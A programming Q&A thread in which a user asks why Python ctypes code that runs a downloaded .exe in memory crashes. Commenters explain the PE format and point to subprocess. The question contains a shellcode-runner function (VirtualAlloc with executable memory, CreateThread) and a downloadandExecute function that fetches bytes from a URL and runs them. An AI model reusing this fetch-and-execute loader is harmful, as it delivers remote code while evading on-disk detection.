# Python Run EXE in memory

Tags: python, memory-management, exe

I'm trying to execute a .exe in memory in python
but is not working...
any help?

the error: Process finished with exit code -1073741819 (0xC0000005)..
only one .exe in python works.. (converted from python to exe)

the code is passed by this function via parameter... its a byte array

```
 def executar(code):
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(code)).from_buffer(code)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(code)))
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
```

Im trying several .exe files....
Im fallowing this post here: 
https://medium.com/@AntiSec_Inc/combining-the-power-of-python-and-assembly-a4cf424be01d

```
 def downloadandExecute(url): 
     response = requests.get(url) 
     code = bytearray(response.content) 
     executar(code)
```

but the error persists

Comment: I don't understand the question. How would it not be executed in memory?

Comment: It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in `GetLastError`?

Comment: Define "*is not working*".  Please say what you expect to happen and what is actually happening.

Comment: Can you give an example of the contents of `code`?

Comment: Hello, i did try several  .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

Comment: @cdarke Im trying several .exe files..

Comment: A 0xC0000005 is a memory violation, very common in C programs which basically means you have a pointer referring to invalid memory.  As @viraptor says, this is a strange way to try to execute an .exe.  For a start they are designed to run in separate processes, not in the same process (that would be a DLL).  Run a C++ .exe and one of the first things it will do is to initialise the run-time library, which will really mess up if you are already using it.  What is it that you are trying to achieve?  What is wrong with the `subprocess` module?  https://docs.python.org/3/library/subprocess.html

Answer (score 3):

I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.

To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.

You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx

Comment: yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

Comment: you probably got told wrong information that EXE files are executable binary code.  They are not,  they are half baked binary files.  When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc.   So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

Comment: Also, most modern OS systems do not really load executables into memory,  they map code sections from disk as virtual memory extents.  So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes.  This way OS can avoid loading tons of binary code that never be executed.

Comment: ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

Comment: Without knowing the exact exe file you're using, it's hard to tell why it worked. Either you got *really* lucky or what happened wasn't what you think happened.

Comment: It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: https://en.wikipedia.org/wiki/List_of_RAM_drive_software#Microsoft_Windows If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.